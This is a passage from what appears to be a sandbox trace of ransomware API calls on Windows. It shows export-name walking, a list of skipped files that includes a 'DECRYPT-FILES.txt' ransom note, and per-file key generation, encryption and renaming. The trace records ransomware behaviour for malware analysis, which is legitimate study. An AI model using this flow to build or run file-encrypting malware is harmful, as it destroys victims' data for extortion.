returned 12 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.808] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.808] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.808] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.808] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.808] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.808] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.808] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.808] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.808] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.808] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.808] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.808] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.808] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.808] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.808] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.808] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.808] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.809] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.809] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.809] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.809] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.809] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.809] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.809] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.809] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.809] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.809] lstrlenA (lpString="DELETEATOM") returned 10 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.809] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.809] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.809] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.809] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.809] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.809] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.809] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.809] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.809] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.810] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.810] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.810] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.810] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.810] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.810] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0180.810] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.810] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.810] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.810] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.810] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.810] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.810] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.810] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.810] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.810] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.810] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.810] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.810] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.810] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.810] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.811] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.811] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.811] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.811] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.811] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.811] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.811] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.811] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.811] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.811] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.811] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.811] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.811] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.811] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.811] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.PFB0YHS") returned 128 [0180.811] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.PFB0YHS.9e5vE") returned 134 [0180.811] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.PFB0YHS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.pfb0yhs"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.PFB0YHS.9e5vE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.pfb0yhs.9e5ve"), dwFlags=0x0) returned 1 [0180.812] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.812] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.813] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.813] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x542fc610, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x542fc610, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaaf0ea80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred.PFB0YHS", cAlternateFileName="PREFER~1.PFB")) returned 0 [0180.813] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.813] CloseHandle (hObject=0x274) returned 1 [0180.813] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2b1e4b40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b1e4b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaaf5ad40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST.EOKT", cAlternateFileName="SYNCHI~1.EOK")) returned 1 [0180.813] lstrcmpiW (lpString1="SYNCHIST.EOKT", lpString2="DECRYPT-FILES.txt") returned 1 [0180.814] lstrcmpiW (lpString1="SYNCHIST.EOKT", lpString2="autorun.inf") returned 1 [0180.814] lstrcmpiW (lpString1="SYNCHIST.EOKT", lpString2="boot.ini") returned 1 [0180.814] lstrcmpiW (lpString1="SYNCHIST.EOKT", lpString2="desktop.ini") returned 1 [0180.814] lstrcmpiW (lpString1="SYNCHIST.EOKT", lpString2="ntuser.dat") returned 1 [0180.814] lstrcmpiW (lpString1="SYNCHIST.EOKT", lpString2="iconcache.db") returned 1 [0180.814] lstrcmpiW (lpString1="SYNCHIST.EOKT", lpString2="bootsect.bak") returned 1 [0180.814] lstrcmpiW (lpString1="SYNCHIST.EOKT", lpString2="ntuser.dat.log") returned 1 [0180.814] lstrcmpiW (lpString1="SYNCHIST.EOKT", lpString2="thumbs.db") returned -1 [0180.814] lstrcmpiW (lpString1="SYNCHIST.EOKT", lpString2="Bootfont.bin") returned 1 [0180.814] lstrlenW (lpString="SYNCHIST.EOKT") returned 13 [0180.814] lstrcmpiW (lpString1="EOKT", lpString2="lnk") returned -1 [0180.814] lstrcmpiW (lpString1="EOKT", lpString2="exe") returned -1 [0180.814] lstrcmpiW (lpString1="EOKT", lpString2="sys") returned -1 [0180.814] lstrcmpiW (lpString1="EOKT", lpString2="dll") returned 1 [0180.814] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0180.814] lstrlenW (lpString="SYNCHIST.EOKT") returned 13 [0180.814] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" [0180.814] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="SYNCHIST.EOKT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.EOKT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.EOKT" [0180.814] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.EOKT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist.eokt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0180.814] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=340) returned 1 [0180.815] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0180.815] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.815] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.815] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.815] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.815] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fdc98*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fdc98*=0x100) returned 1 [0180.815] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.816] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.816] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.816] CloseHandle (hObject=0x278) returned 1 [0180.816] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.816] WriteFile (in: hFile=0x274, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fdcb8, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fdcb8*=0x108, lpOverlapped=0x0) returned 1 [0180.817] CloseHandle (hObject=0x0) returned 0 [0180.817] CloseHandle (hObject=0x274) returned 1 [0180.817] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.818] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.818] GetTickCount () returned 0x1134a4a [0180.818] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.818] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.818] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.818] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.819] lstrlenA (lpString="kernel32.dll") returned 12 [0180.819] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.819] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.819] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.819] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.819] lstrlenA (lpString="ADDATOMA") returned 8 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.819] lstrlenA (lpString="ADDATOMW") returned 8 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.819] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.819] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.819] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.819] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.819] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.819] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.819] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.819] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.819] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.819] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.820] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.820] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.820] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.820] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.820] lstrlenA 